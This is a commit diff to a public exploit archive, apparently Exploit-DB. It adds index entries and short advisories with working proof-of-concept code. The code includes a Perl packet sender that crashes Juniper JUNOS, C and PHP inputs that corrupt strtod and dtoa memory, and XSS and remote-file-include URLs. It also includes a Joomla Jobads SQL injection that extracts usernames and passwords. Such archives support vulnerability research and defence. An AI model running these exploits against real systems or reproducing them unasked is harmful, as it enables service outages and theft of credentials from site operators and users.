Updated 05_24_2014

2014-05-24 04:36:31 +00:00 · 2014-05-24 04:36:31 +00:00 · d9c7bc59db
commit d9c7bc59db
parent 3a4999409a
7 changed files with 87 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -30159,3 +30159,9 @@ id,file,description,date,author,platform,type,port
 33473,platforms/php/webapps/33473.txt,"RoundCube Webmail 0.2 Cross Site Scripting Vulnerability",2010-01-06,"j4ck and Globus",php,webapps,0
 33474,platforms/php/webapps/33474.txt,"Joomla! DM Orders Component 'id' Parameter SQL Injection Vulnerability",2010-01-07,NoGe,php,webapps,0
 33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 Multiple SQL Injection and HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0
+33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS <= 7.1.1 Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0
+33477,platforms/php/webapps/33477.txt,"Calendarix 0.7 'calpath' Parameter Remote File Include Vulnerability",2010-01-07,Saywhat,php,webapps,0
+33478,platforms/php/webapps/33478.txt,"Joomla! Jobads 'type' Parameter SQL Injection Vulnerability",2010-01-08,N0KT4,php,webapps,0
+33479,platforms/osx/dos/33479.c,"Mac OS X 10.x 'libc/strtod(3)' Memory Corruption Vulnerability",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0
+33480,platforms/linux/dos/33480.txt,"MATLAB  R2009b 'dtoa' Implementation Memory Corruption Vulnerability",2010-01-08,"Maksymilian Arciemowicz",linux,dos,0
+33481,platforms/asp/webapps/33481.txt,"DevWorx BlogWorx 1.0 'forum.asp' Cross Site Scripting Vulnerability",2010-01-09,Cyber_945,asp,webapps,0
--- a/platforms/asp/webapps/33481.txt
+++ b/platforms/asp/webapps/33481.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37695/info
+
+DevWorx BlogWorx is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+BlogWorx 1.0 is vulnerable; other versions may be affected as well.
+
+http://www.example.com/openforum/forum.asp?fid=12&ofact=1&ofmsgid=227&ofdisp=[XSS-Vuln] 
--- a/platforms/hardware/dos/33476.pl
+++ b/platforms/hardware/dos/33476.pl
@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/37670/info
+
+JUNOS is prone to a remote denial-of-service vulnerability that arises when the application handles specially crafted TCP packets.
+
+JUNOS is also prone to six other unspecified security vulnerabilities. These issues may include privilege-escalation or denial-of-service issues.
+
+JUNOS 7.x, 8.x, and 9.x are affected. JUNOS 10.x is not believed to be affected. 
+
+#!/usr/bin/perl
+
+my $host =      shift;
+my $port =      shift;
+
+use             Net::Packet qw($Env);
+
+use             Net::Packet::IPv4;
+my $ip =        Net::Packet::IPv4->new(dst => $host);
+
+use             Net::Packet::TCP;
+
+my $tcp =       Net::Packet::TCP->new(
+                    dst         => $port,
+                    options     =>  "\x65\x02\x01\x01", 
+                );
+
+use             Net::Packet::Frame;
+my $frame =     Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);
+
+$frame->send;
+exit 0;
--- a/platforms/linux/dos/33480.txt
+++ b/platforms/linux/dos/33480.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37688/info
+
+MATLAB is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.
+
+Attackers may exploit this issue to execute arbitrary code within the context of affected applications.
+
+MATLAB R2009b is affected; other versions may also be vulnerable. 
+
+cxib=0.<?php echo str_repeat("1",296450); ?> 
--- a/platforms/osx/dos/33479.c
+++ b/platforms/osx/dos/33479.c
@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/37687/info
+
+Mac OS X is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index.
+
+Attackers may exploit this issue to execute arbitrary code within the context of affected applications.
+
+Mac OS X 10.5 and 10.6 are affected; other versions may also be vulnerable. 
+
+#include <stdio.h>
+#include <stdlib.h>
+int main ()
+{
+char number[] = "0.1111111111...11", *e;
+double weed = strtod(number, &e);
+printf("grams = %lf\n", weed);
+return 0;
+} 
--- a/platforms/php/webapps/33477.txt
+++ b/platforms/php/webapps/33477.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/37673/info
+
+Calendarix is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
+
+Calendarix 0.7 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cal_config.inc.php?calpath= EVIL SITE??? 
--- a/platforms/php/webapps/33478.txt
+++ b/platforms/php/webapps/33478.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/37686/info
+
+The Jobads component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_jobads&task=view&type=-999+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+mos_users--